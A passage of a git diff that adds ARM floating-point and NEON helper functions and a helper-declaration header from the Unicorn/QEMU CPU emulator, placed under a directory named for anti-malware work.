{
    float_status *fp_status = &env->vfp.standard_fp_status;

    uint32_t prev_rmode = get_float_rounding_mode(fp_status);
    set_float_rounding_mode(rmode, fp_status);

    return prev_rmode;
}

/* Half precision conversions.  */
/* FPSCR bit 26 (AHP) clear selects IEEE half-precision; in IEEE mode any
 * NaN result must be quietened.
 */
static float32 do_fcvt_f16_to_f32(uint32_t a, CPUARMState *env, float_status *s)
{
    int ieee = (env->vfp.xregs[ARM_VFP_FPSCR] & (1 << 26)) == 0;
    float32 r = float16_to_float32(make_float16(a), ieee, s);
    if (ieee) {
        return float32_maybe_silence_nan(r);
    }
    return r;
}

static uint32_t do_fcvt_f32_to_f16(float32 a, CPUARMState *env, float_status *s)
{
    int ieee = (env->vfp.xregs[ARM_VFP_FPSCR] & (1 << 26)) == 0;
    float16 r = float32_to_float16(a, ieee, s);
    if (ieee) {
        r = float16_maybe_silence_nan(r);
    }
    return float16_val(r);
}

/* NEON variants use the standard (default-FPSCR) float status. */
float32 HELPER(neon_fcvt_f16_to_f32)(uint32_t a, CPUARMState *env)
{
    return do_fcvt_f16_to_f32(a, env, &env->vfp.standard_fp_status);
}

uint32_t HELPER(neon_fcvt_f32_to_f16)(float32 a, CPUARMState *env)
{
    return do_fcvt_f32_to_f16(a, env, &env->vfp.standard_fp_status);
}

/* VFP variants honour the live FPSCR float status. */
float32 HELPER(vfp_fcvt_f16_to_f32)(uint32_t a, CPUARMState *env)
{
    return do_fcvt_f16_to_f32(a, env, &env->vfp.fp_status);
}

uint32_t HELPER(vfp_fcvt_f32_to_f16)(float32 a, CPUARMState *env)
{
    return do_fcvt_f32_to_f16(a, env, &env->vfp.fp_status);
}

float64 HELPER(vfp_fcvt_f16_to_f64)(uint32_t a, CPUARMState *env)
{
    int ieee = (env->vfp.xregs[ARM_VFP_FPSCR] & (1 << 26)) == 0;
    float64 r = float16_to_float64(make_float16(a), ieee, &env->vfp.fp_status);
    if (ieee) {
        return float64_maybe_silence_nan(r);
    }
    return r;
}

uint32_t HELPER(vfp_fcvt_f64_to_f16)(float64 a, CPUARMState *env)
{
    int ieee = (env->vfp.xregs[ARM_VFP_FPSCR] & (1 << 26)) == 0;
    float16 r = float64_to_float16(a, ieee, &env->vfp.fp_status);
    if (ieee) {
        r = float16_maybe_silence_nan(r);
    }
    return float16_val(r);
}

#define float32_two make_float32(0x40000000)
#define float32_three make_float32(0x40400000)
#define float32_one_point_five make_float32(0x3fc00000)

/* VRECPS step: 2 - a*b, with the special inf*0 -> 2.0 case. */
float32 HELPER(recps_f32)(float32 a, float32 b, CPUARMState *env)
{
    float_status *s = &env->vfp.standard_fp_status;
    if ((float32_is_infinity(a) && float32_is_zero_or_denormal(b)) ||
        (float32_is_infinity(b) && float32_is_zero_or_denormal(a))) {
        if (!(float32_is_zero(a) || float32_is_zero(b))) {
            float_raise(float_flag_input_denormal, s);
        }
        return float32_two;
    }
    return float32_sub(float32_two, float32_mul(a, b, s), s);
}

/* VRSQRTS step: (3 - a*b) / 2, with the special inf*0 -> 1.5 case. */
float32 HELPER(rsqrts_f32)(float32 a, float32 b, CPUARMState *env)
{
    float_status *s = &env->vfp.standard_fp_status;
    float32 product;
    if ((float32_is_infinity(a) && float32_is_zero_or_denormal(b)) ||
        (float32_is_infinity(b) && float32_is_zero_or_denormal(a))) {
        if (!(float32_is_zero(a) || float32_is_zero(b))) {
            float_raise(float_flag_input_denormal, s);
        }
        return float32_one_point_five;
    }
    product = float32_mul(a, b, s);
    return float32_div(float32_sub(float32_three, product, s), float32_two, s);
}

/* NEON helpers.  */

/* Constants 256 and 512 are used in some helpers; we avoid relying on
 * int->float conversions at run-time.
*/ +#define float64_256 make_float64(0x4070000000000000LL) +#define float64_512 make_float64(0x4080000000000000LL) +#define float32_maxnorm make_float32(0x7f7fffff) +#define float64_maxnorm make_float64(0x7fefffffffffffffLL) + +/* Reciprocal functions + * + * The algorithm that must be used to calculate the estimate + * is specified by the ARM ARM, see FPRecipEstimate() + */ + +static float64 recip_estimate(float64 a, float_status *real_fp_status) +{ + /* These calculations mustn't set any fp exception flags, + * so we use a local copy of the fp_status. + */ + float_status dummy_status = *real_fp_status; + float_status *s = &dummy_status; + /* q = (int)(a * 512.0) */ + float64 q = float64_mul(float64_512, a, s); + int64_t q_int = float64_to_int64_round_to_zero(q, s); + + /* r = 1.0 / (((double)q + 0.5) / 512.0) */ + q = int64_to_float64(q_int, s); + q = float64_add(q, float64_half, s); + q = float64_div(q, float64_512, s); + q = float64_div(float64_one, q, s); + + /* s = (int)(256.0 * r + 0.5) */ + q = float64_mul(q, float64_256, s); + q = float64_add(q, float64_half, s); + q_int = float64_to_int64_round_to_zero(q, s); + + /* return (double)s / 256.0 */ + return float64_div(int64_to_float64(q_int, s), float64_256, s); +} + +/* Common wrapper to call recip_estimate */ +static float64 call_recip_estimate(float64 num, int off, float_status *fpst) +{ + uint64_t val64 = float64_val(num); + uint64_t frac = extract64(val64, 0, 52); + int64_t exp = extract64(val64, 52, 11); + uint64_t sbit; + float64 scaled, estimate; + + /* Generate the scaled number for the estimate function */ + if (exp == 0) { + if (extract64(frac, 51, 1) == 0) { + exp = -1; + frac = extract64(frac, 0, 50) << 2; + } else { + frac = extract64(frac, 0, 51) << 1; + } + } + + /* scaled = '0' : '01111111110' : fraction<51:44> : Zeros(44); */ + scaled = make_float64((0x3feULL << 52) + | extract64(frac, 44, 8) << 44); + + estimate = recip_estimate(scaled, fpst); + + /* Build new result */ + val64 = 
float64_val(estimate); + sbit = 0x8000000000000000ULL & val64; + exp = off - exp; + frac = extract64(val64, 0, 52); + + if (exp == 0) { + frac = 1ULL << 51 | extract64(frac, 1, 51); + } else if (exp == -1) { + frac = 1ULL << 50 | extract64(frac, 2, 50); + exp = 0; + } + + return make_float64(sbit | (exp << 52) | frac); +} + +static bool round_to_inf(float_status *fpst, bool sign_bit) +{ + switch (fpst->float_rounding_mode) { + case float_round_nearest_even: /* Round to Nearest */ + return true; + case float_round_up: /* Round to +Inf */ + return !sign_bit; + case float_round_down: /* Round to -Inf */ + return sign_bit; + case float_round_to_zero: /* Round to Zero */ + return false; + default: + break; + } + + g_assert_not_reached(); + return false; +} + +float32 HELPER(recpe_f32)(float32 input, void *fpstp) +{ + float_status *fpst = fpstp; + float32 f32 = float32_squash_input_denormal(input, fpst); + uint32_t f32_val = float32_val(f32); + uint32_t f32_sbit = 0x80000000ULL & f32_val; + int32_t f32_exp = extract32(f32_val, 23, 8); + uint32_t f32_frac = extract32(f32_val, 0, 23); + float64 f64, r64; + uint64_t r64_val; + int64_t r64_exp; + uint64_t r64_frac; + + if (float32_is_any_nan(f32)) { + float32 nan = f32; + if (float32_is_signaling_nan(f32)) { + float_raise(float_flag_invalid, fpst); + nan = float32_maybe_silence_nan(f32); + } + if (fpst->default_nan_mode) { + nan = float32_default_nan; + } + return nan; + } else if (float32_is_infinity(f32)) { + return float32_set_sign(float32_zero, float32_is_neg(f32)); + } else if (float32_is_zero(f32)) { + float_raise(float_flag_divbyzero, fpst); + return float32_set_sign(float32_infinity, float32_is_neg(f32)); + } else if ((f32_val & ~(1ULL << 31)) < (1ULL << 21)) { + /* Abs(value) < 2.0^-128 */ + float_raise(float_flag_overflow | float_flag_inexact, fpst); + if (round_to_inf(fpst, f32_sbit)) { + return float32_set_sign(float32_infinity, float32_is_neg(f32)); + } else { + return float32_set_sign(float32_maxnorm, 
float32_is_neg(f32)); + } + } else if (f32_exp >= 253 && fpst->flush_to_zero) { + float_raise(float_flag_underflow, fpst); + return float32_set_sign(float32_zero, float32_is_neg(f32)); + } + + + f64 = make_float64(((int64_t)(f32_exp) << 52) | (int64_t)(f32_frac) << 29); + r64 = call_recip_estimate(f64, 253, fpst); + r64_val = float64_val(r64); + r64_exp = extract64(r64_val, 52, 11); + r64_frac = extract64(r64_val, 0, 52); + + /* result = sign : result_exp<7:0> : fraction<51:29>; */ + return make_float32(f32_sbit | + (r64_exp & 0xff) << 23 | + extract64(r64_frac, 29, 24)); +} + +float64 HELPER(recpe_f64)(float64 input, void *fpstp) +{ + float_status *fpst = fpstp; + float64 f64 = float64_squash_input_denormal(input, fpst); + uint64_t f64_val = float64_val(f64); + uint64_t f64_sbit = 0x8000000000000000ULL & f64_val; + int64_t f64_exp = extract64(f64_val, 52, 11); + float64 r64; + uint64_t r64_val; + int64_t r64_exp; + uint64_t r64_frac; + + /* Deal with any special cases */ + if (float64_is_any_nan(f64)) { + float64 nan = f64; + if (float64_is_signaling_nan(f64)) { + float_raise(float_flag_invalid, fpst); + nan = float64_maybe_silence_nan(f64); + } + if (fpst->default_nan_mode) { + nan = float64_default_nan; + } + return nan; + } else if (float64_is_infinity(f64)) { + return float64_set_sign(float64_zero, float64_is_neg(f64)); + } else if (float64_is_zero(f64)) { + float_raise(float_flag_divbyzero, fpst); + return float64_set_sign(float64_infinity, float64_is_neg(f64)); + } else if ((f64_val & ~(1ULL << 63)) < (1ULL << 50)) { + /* Abs(value) < 2.0^-1024 */ + float_raise(float_flag_overflow | float_flag_inexact, fpst); + if (round_to_inf(fpst, f64_sbit)) { + return float64_set_sign(float64_infinity, float64_is_neg(f64)); + } else { + return float64_set_sign(float64_maxnorm, float64_is_neg(f64)); + } + } else if (f64_exp >= 1023 && fpst->flush_to_zero) { + float_raise(float_flag_underflow, fpst); + return float64_set_sign(float64_zero, float64_is_neg(f64)); + } + + r64 
= call_recip_estimate(f64, 2045, fpst); + r64_val = float64_val(r64); + r64_exp = extract64(r64_val, 52, 11); + r64_frac = extract64(r64_val, 0, 52); + + /* result = sign : result_exp<10:0> : fraction<51:0> */ + return make_float64(f64_sbit | + ((r64_exp & 0x7ff) << 52) | + r64_frac); +} + +/* The algorithm that must be used to calculate the estimate + * is specified by the ARM ARM. + */ +static float64 recip_sqrt_estimate(float64 a, float_status *real_fp_status) +{ + /* These calculations mustn't set any fp exception flags, + * so we use a local copy of the fp_status. + */ + float_status dummy_status = *real_fp_status; + float_status *s = &dummy_status; + float64 q; + int64_t q_int; + + if (float64_lt(a, float64_half, s)) { + /* range 0.25 <= a < 0.5 */ + + /* a in units of 1/512 rounded down */ + /* q0 = (int)(a * 512.0); */ + q = float64_mul(float64_512, a, s); + q_int = float64_to_int64_round_to_zero(q, s); + + /* reciprocal root r */ + /* r = 1.0 / sqrt(((double)q0 + 0.5) / 512.0); */ + q = int64_to_float64(q_int, s); + q = float64_add(q, float64_half, s); + q = float64_div(q, float64_512, s); + q = float64_sqrt(q, s); + q = float64_div(float64_one, q, s); + } else { + /* range 0.5 <= a < 1.0 */ + + int64_t q_int; + + /* a in units of 1/256 rounded down */ + /* q1 = (int)(a * 256.0); */ + q = float64_mul(float64_256, a, s); + q_int = float64_to_int64_round_to_zero(q, s); + + /* reciprocal root r */ + /* r = 1.0 /sqrt(((double)q1 + 0.5) / 256); */ + q = int64_to_float64(q_int, s); + q = float64_add(q, float64_half, s); + q = float64_div(q, float64_256, s); + q = float64_sqrt(q, s); + q = float64_div(float64_one, q, s); + } + /* r in units of 1/256 rounded to nearest */ + /* s = (int)(256.0 * r + 0.5); */ + + q = float64_mul(q, float64_256,s ); + q = float64_add(q, float64_half, s); + q_int = float64_to_int64_round_to_zero(q, s); + + /* return (double)s / 256.0;*/ + return float64_div(int64_to_float64(q_int, s), float64_256, s); +} + +float32 
HELPER(rsqrte_f32)(float32 input, void *fpstp) +{ + float_status *s = fpstp; + float32 f32 = float32_squash_input_denormal(input, s); + uint32_t val = float32_val(f32); + uint32_t f32_sbit = 0x80000000 & val; + int32_t f32_exp = extract32(val, 23, 8); + uint32_t f32_frac = extract32(val, 0, 23); + uint64_t f64_frac; + uint64_t val64; + int result_exp; + float64 f64; + + if (float32_is_any_nan(f32)) { + float32 nan = f32; + if (float32_is_signaling_nan(f32)) { + float_raise(float_flag_invalid, s); + nan = float32_maybe_silence_nan(f32); + } + if (s->default_nan_mode) { + nan = float32_default_nan; + } + return nan; + } else if (float32_is_zero(f32)) { + float_raise(float_flag_divbyzero, s); + return float32_set_sign(float32_infinity, float32_is_neg(f32)); + } else if (float32_is_neg(f32)) { + float_raise(float_flag_invalid, s); + return float32_default_nan; + } else if (float32_is_infinity(f32)) { + return float32_zero; + } + + /* Scale and normalize to a double-precision value between 0.25 and 1.0, + * preserving the parity of the exponent. 
*/ + + f64_frac = ((uint64_t) f32_frac) << 29; + if (f32_exp == 0) { + while (extract64(f64_frac, 51, 1) == 0) { + f64_frac = f64_frac << 1; + f32_exp = f32_exp-1; + } + f64_frac = extract64(f64_frac, 0, 51) << 1; + } + + if (extract64(f32_exp, 0, 1) == 0) { + f64 = make_float64(((uint64_t) f32_sbit) << 32 + | (0x3feULL << 52) + | f64_frac); + } else { + f64 = make_float64(((uint64_t) f32_sbit) << 32 + | (0x3fdULL << 52) + | f64_frac); + } + + result_exp = (380 - f32_exp) / 2; + + f64 = recip_sqrt_estimate(f64, s); + + val64 = float64_val(f64); + + val = ((result_exp & 0xff) << 23) + | ((val64 >> 29) & 0x7fffff); + return make_float32(val); +} + +float64 HELPER(rsqrte_f64)(float64 input, void *fpstp) +{ + float_status *s = fpstp; + float64 f64 = float64_squash_input_denormal(input, s); + uint64_t val = float64_val(f64); + uint64_t f64_sbit = 0x8000000000000000ULL & val; + int64_t f64_exp = extract64(val, 52, 11); + uint64_t f64_frac = extract64(val, 0, 52); + int64_t result_exp; + uint64_t result_frac; + + if (float64_is_any_nan(f64)) { + float64 nan = f64; + if (float64_is_signaling_nan(f64)) { + float_raise(float_flag_invalid, s); + nan = float64_maybe_silence_nan(f64); + } + if (s->default_nan_mode) { + nan = float64_default_nan; + } + return nan; + } else if (float64_is_zero(f64)) { + float_raise(float_flag_divbyzero, s); + return float64_set_sign(float64_infinity, float64_is_neg(f64)); + } else if (float64_is_neg(f64)) { + float_raise(float_flag_invalid, s); + return float64_default_nan; + } else if (float64_is_infinity(f64)) { + return float64_zero; + } + + /* Scale and normalize to a double-precision value between 0.25 and 1.0, + * preserving the parity of the exponent. 
*/ + + if (f64_exp == 0) { + while (extract64(f64_frac, 51, 1) == 0) { + f64_frac = f64_frac << 1; + f64_exp = f64_exp - 1; + } + f64_frac = extract64(f64_frac, 0, 51) << 1; + } + + if (extract64(f64_exp, 0, 1) == 0) { + f64 = make_float64(f64_sbit + | (0x3feULL << 52) + | f64_frac); + } else { + f64 = make_float64(f64_sbit + | (0x3fdULL << 52) + | f64_frac); + } + + result_exp = (3068 - f64_exp) / 2; + + f64 = recip_sqrt_estimate(f64, s); + + result_frac = extract64(float64_val(f64), 0, 52); + + return make_float64(f64_sbit | + ((result_exp & 0x7ff) << 52) | + result_frac); +} + +uint32_t HELPER(recpe_u32)(uint32_t a, void *fpstp) +{ + float_status *s = fpstp; + float64 f64; + + if ((a & 0x80000000) == 0) { + return 0xffffffff; + } + + f64 = make_float64((0x3feULL << 52) + | ((int64_t)(a & 0x7fffffff) << 21)); + + f64 = recip_estimate(f64, s); + + return 0x80000000 | ((float64_val(f64) >> 21) & 0x7fffffff); +} + +uint32_t HELPER(rsqrte_u32)(uint32_t a, void *fpstp) +{ + float_status *fpst = fpstp; + float64 f64; + + if ((a & 0xc0000000) == 0) { + return 0xffffffff; + } + + if (a & 0x80000000) { + f64 = make_float64((0x3feULL << 52) + | ((uint64_t)(a & 0x7fffffff) << 21)); + } else { /* bits 31-30 == '01' */ + f64 = make_float64((0x3fdULL << 52) + | ((uint64_t)(a & 0x3fffffff) << 22)); + } + + f64 = recip_sqrt_estimate(f64, fpst); + + return 0x80000000 | ((float64_val(f64) >> 21) & 0x7fffffff); +} + +/* VFPv4 fused multiply-accumulate */ +float32 VFP_HELPER(muladd, s)(float32 a, float32 b, float32 c, void *fpstp) +{ + float_status *fpst = fpstp; + return float32_muladd(a, b, c, 0, fpst); +} + +float64 VFP_HELPER(muladd, d)(float64 a, float64 b, float64 c, void *fpstp) +{ + float_status *fpst = fpstp; + return float64_muladd(a, b, c, 0, fpst); +} + +/* ARMv8 round to integral */ +float32 HELPER(rints_exact)(float32 x, void *fp_status) +{ + return float32_round_to_int(x, fp_status); +} + +float64 HELPER(rintd_exact)(float64 x, void *fp_status) +{ + return 
float64_round_to_int(x, fp_status); +} + +float32 HELPER(rints)(float32 x, void *fp_status) +{ + int old_flags = get_float_exception_flags(fp_status), new_flags; + float32 ret; + + ret = float32_round_to_int(x, fp_status); + + /* Suppress any inexact exceptions the conversion produced */ + if (!(old_flags & float_flag_inexact)) { + new_flags = get_float_exception_flags(fp_status); + set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); + } + + return ret; +} + +float64 HELPER(rintd)(float64 x, void *fp_status) +{ + int old_flags = get_float_exception_flags(fp_status), new_flags; + float64 ret; + + ret = float64_round_to_int(x, fp_status); + + new_flags = get_float_exception_flags(fp_status); + + /* Suppress any inexact exceptions the conversion produced */ + if (!(old_flags & float_flag_inexact)) { + new_flags = get_float_exception_flags(fp_status); + set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); + } + + return ret; +} + +/* Convert ARM rounding mode to softfloat */ +int arm_rmode_to_sf(int rmode) +{ + switch (rmode) { + case FPROUNDING_TIEAWAY: + rmode = float_round_ties_away; + break; + case FPROUNDING_ODD: + /* FIXME: add support for TIEAWAY and ODD */ + qemu_log_mask(LOG_UNIMP, "arm: unimplemented rounding mode: %d\n", + rmode); + case FPROUNDING_TIEEVEN: + default: + rmode = float_round_nearest_even; + break; + case FPROUNDING_POSINF: + rmode = float_round_up; + break; + case FPROUNDING_NEGINF: + rmode = float_round_down; + break; + case FPROUNDING_ZERO: + rmode = float_round_to_zero; + break; + } + return rmode; +} + +/* CRC helpers. + * The upper bytes of val (above the number specified by 'bytes') must have + * been zeroed out by the caller. + */ +uint32_t HELPER(crc32_arm)(uint32_t acc, uint32_t val, uint32_t bytes) +{ +#if 0 // FIXME + uint8_t buf[4]; + + stl_le_p(buf, val); + + /* zlib crc32 converts the accumulator and output to one's complement. 
*/ + return crc32(acc ^ 0xffffffff, buf, bytes) ^ 0xffffffff; +#endif + return 0; +} + +uint32_t HELPER(crc32c)(uint32_t acc, uint32_t val, uint32_t bytes) +{ + uint8_t buf[4]; + + stl_le_p(buf, val); + + /* Linux crc32c converts the output to one's complement. */ + return crc32c(acc, buf, bytes) ^ 0xffffffff; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.h new file mode 100644 index 0000000..6427c18 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/helper.h @@ -0,0 +1,544 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) + +DEF_HELPER_FLAGS_1(clz_arm, TCG_CALL_NO_RWG_SE, i32, i32) + +DEF_HELPER_FLAGS_1(sxtb16, TCG_CALL_NO_RWG_SE, i32, i32) +DEF_HELPER_FLAGS_1(uxtb16, TCG_CALL_NO_RWG_SE, i32, i32) + +DEF_HELPER_3(add_setq, i32, env, i32, i32) +DEF_HELPER_3(add_saturate, i32, env, i32, i32) +DEF_HELPER_3(sub_saturate, i32, env, i32, i32) +DEF_HELPER_3(add_usaturate, i32, env, i32, i32) +DEF_HELPER_3(sub_usaturate, i32, env, i32, i32) +DEF_HELPER_2(double_saturate, i32, env, s32) +DEF_HELPER_FLAGS_2(sdiv, TCG_CALL_NO_RWG_SE, s32, s32, s32) +DEF_HELPER_FLAGS_2(udiv, TCG_CALL_NO_RWG_SE, i32, i32, i32) +DEF_HELPER_FLAGS_1(rbit, TCG_CALL_NO_RWG_SE, i32, i32) + +#define PAS_OP(pfx) \ + DEF_HELPER_3(pfx ## add8, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## sub8, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## sub16, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## add16, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## addsubx, i32, i32, i32, ptr) \ + DEF_HELPER_3(pfx ## subaddx, i32, i32, i32, ptr) + +PAS_OP(s) +PAS_OP(u) +#undef PAS_OP + +#define PAS_OP(pfx) \ + DEF_HELPER_2(pfx ## add8, i32, i32, i32) \ + DEF_HELPER_2(pfx ## sub8, i32, i32, i32) \ + DEF_HELPER_2(pfx ## sub16, i32, i32, i32) \ + DEF_HELPER_2(pfx ## add16, i32, i32, i32) \ + DEF_HELPER_2(pfx ## addsubx, i32, i32, i32) \ + DEF_HELPER_2(pfx ## subaddx, i32, i32, i32) +PAS_OP(q) +PAS_OP(sh) 
+PAS_OP(uq) +PAS_OP(uh) +#undef PAS_OP + +DEF_HELPER_3(ssat, i32, env, i32, i32) +DEF_HELPER_3(usat, i32, env, i32, i32) +DEF_HELPER_3(ssat16, i32, env, i32, i32) +DEF_HELPER_3(usat16, i32, env, i32, i32) + +DEF_HELPER_FLAGS_2(usad8, TCG_CALL_NO_RWG_SE, i32, i32, i32) + +DEF_HELPER_FLAGS_3(sel_flags, TCG_CALL_NO_RWG_SE, + i32, i32, i32, i32) +DEF_HELPER_2(exception_internal, void, env, i32) +DEF_HELPER_3(exception_with_syndrome, void, env, i32, i32) +DEF_HELPER_1(wfi, void, env) +DEF_HELPER_1(wfe, void, env) +DEF_HELPER_1(pre_hvc, void, env) +DEF_HELPER_2(pre_smc, void, env, i32) + +DEF_HELPER_3(cpsr_write, void, env, i32, i32) +DEF_HELPER_1(cpsr_read, i32, env) + +DEF_HELPER_3(v7m_msr, void, env, i32, i32) +DEF_HELPER_2(v7m_mrs, i32, env, i32) + +DEF_HELPER_3(access_check_cp_reg, void, env, ptr, i32) +DEF_HELPER_3(set_cp_reg, void, env, ptr, i32) +DEF_HELPER_2(get_cp_reg, i32, env, ptr) +DEF_HELPER_3(set_cp_reg64, void, env, ptr, i64) +DEF_HELPER_2(get_cp_reg64, i64, env, ptr) + +DEF_HELPER_3(msr_i_pstate, void, env, i32, i32) +DEF_HELPER_1(clear_pstate_ss, void, env) +DEF_HELPER_1(exception_return, void, env) + +DEF_HELPER_2(get_r13_banked, i32, env, i32) +DEF_HELPER_3(set_r13_banked, void, env, i32, i32) + +DEF_HELPER_2(get_user_reg, i32, env, i32) +DEF_HELPER_3(set_user_reg, void, env, i32, i32) + +DEF_HELPER_1(vfp_get_fpscr, i32, env) +DEF_HELPER_2(vfp_set_fpscr, void, env, i32) + +DEF_HELPER_3(vfp_adds, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_addd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_subs, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_subd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_muls, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_muld, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_divs, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_divd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_maxs, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_maxd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_mins, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_mind, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_maxnums, f32, f32, f32, ptr) 
+DEF_HELPER_3(vfp_maxnumd, f64, f64, f64, ptr) +DEF_HELPER_3(vfp_minnums, f32, f32, f32, ptr) +DEF_HELPER_3(vfp_minnumd, f64, f64, f64, ptr) +DEF_HELPER_1(vfp_negs, f32, f32) +DEF_HELPER_1(vfp_negd, f64, f64) +DEF_HELPER_1(vfp_abss, f32, f32) +DEF_HELPER_1(vfp_absd, f64, f64) +DEF_HELPER_2(vfp_sqrts, f32, f32, env) +DEF_HELPER_2(vfp_sqrtd, f64, f64, env) +DEF_HELPER_3(vfp_cmps, void, f32, f32, env) +DEF_HELPER_3(vfp_cmpd, void, f64, f64, env) +DEF_HELPER_3(vfp_cmpes, void, f32, f32, env) +DEF_HELPER_3(vfp_cmped, void, f64, f64, env) + +DEF_HELPER_2(vfp_fcvtds, f64, f32, env) +DEF_HELPER_2(vfp_fcvtsd, f32, f64, env) + +DEF_HELPER_2(vfp_uitos, f32, i32, ptr) +DEF_HELPER_2(vfp_uitod, f64, i32, ptr) +DEF_HELPER_2(vfp_sitos, f32, i32, ptr) +DEF_HELPER_2(vfp_sitod, f64, i32, ptr) + +DEF_HELPER_2(vfp_touis, i32, f32, ptr) +DEF_HELPER_2(vfp_touid, i32, f64, ptr) +DEF_HELPER_2(vfp_touizs, i32, f32, ptr) +DEF_HELPER_2(vfp_touizd, i32, f64, ptr) +DEF_HELPER_2(vfp_tosis, i32, f32, ptr) +DEF_HELPER_2(vfp_tosid, i32, f64, ptr) +DEF_HELPER_2(vfp_tosizs, i32, f32, ptr) +DEF_HELPER_2(vfp_tosizd, i32, f64, ptr) + +DEF_HELPER_3(vfp_toshs_round_to_zero, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_tosls_round_to_zero, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_touhs_round_to_zero, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_touls_round_to_zero, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_toshd_round_to_zero, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tosld_round_to_zero, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_touhd_round_to_zero, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tould_round_to_zero, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_toshs, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_tosls, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_tosqs, i64, f32, i32, ptr) +DEF_HELPER_3(vfp_touhs, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_touls, i32, f32, i32, ptr) +DEF_HELPER_3(vfp_touqs, i64, f32, i32, ptr) +DEF_HELPER_3(vfp_toshd, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tosld, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tosqd, i64, f64, i32, ptr) 
+DEF_HELPER_3(vfp_touhd, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_tould, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_touqd, i64, f64, i32, ptr) +DEF_HELPER_3(vfp_shtos, f32, i32, i32, ptr) +DEF_HELPER_3(vfp_sltos, f32, i32, i32, ptr) +DEF_HELPER_3(vfp_sqtos, f32, i64, i32, ptr) +DEF_HELPER_3(vfp_uhtos, f32, i32, i32, ptr) +DEF_HELPER_3(vfp_ultos, f32, i32, i32, ptr) +DEF_HELPER_3(vfp_uqtos, f32, i64, i32, ptr) +DEF_HELPER_3(vfp_shtod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_sltod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_sqtod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_uhtod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_ultod, f64, i64, i32, ptr) +DEF_HELPER_3(vfp_uqtod, f64, i64, i32, ptr) + +DEF_HELPER_FLAGS_2(set_rmode, TCG_CALL_NO_RWG, i32, i32, env) +DEF_HELPER_FLAGS_2(set_neon_rmode, TCG_CALL_NO_RWG, i32, i32, env) + +DEF_HELPER_2(vfp_fcvt_f16_to_f32, f32, i32, env) +DEF_HELPER_2(vfp_fcvt_f32_to_f16, i32, f32, env) +DEF_HELPER_2(neon_fcvt_f16_to_f32, f32, i32, env) +DEF_HELPER_2(neon_fcvt_f32_to_f16, i32, f32, env) +DEF_HELPER_FLAGS_2(vfp_fcvt_f16_to_f64, TCG_CALL_NO_RWG, f64, i32, env) +DEF_HELPER_FLAGS_2(vfp_fcvt_f64_to_f16, TCG_CALL_NO_RWG, i32, f64, env) + +DEF_HELPER_4(vfp_muladdd, f64, f64, f64, f64, ptr) +DEF_HELPER_4(vfp_muladds, f32, f32, f32, f32, ptr) + +DEF_HELPER_3(recps_f32, f32, f32, f32, env) +DEF_HELPER_3(rsqrts_f32, f32, f32, f32, env) +DEF_HELPER_FLAGS_2(recpe_f32, TCG_CALL_NO_RWG, f32, f32, ptr) +DEF_HELPER_FLAGS_2(recpe_f64, TCG_CALL_NO_RWG, f64, f64, ptr) +DEF_HELPER_FLAGS_2(rsqrte_f32, TCG_CALL_NO_RWG, f32, f32, ptr) +DEF_HELPER_FLAGS_2(rsqrte_f64, TCG_CALL_NO_RWG, f64, f64, ptr) +DEF_HELPER_2(recpe_u32, i32, i32, ptr) +DEF_HELPER_FLAGS_2(rsqrte_u32, TCG_CALL_NO_RWG, i32, i32, ptr) +DEF_HELPER_5(neon_tbl, i32, env, i32, i32, i32, i32) + +DEF_HELPER_3(shl_cc, i32, env, i32, i32) +DEF_HELPER_3(shr_cc, i32, env, i32, i32) +DEF_HELPER_3(sar_cc, i32, env, i32, i32) +DEF_HELPER_3(ror_cc, i32, env, i32, i32) + +DEF_HELPER_FLAGS_2(rints_exact, TCG_CALL_NO_RWG, f32, 
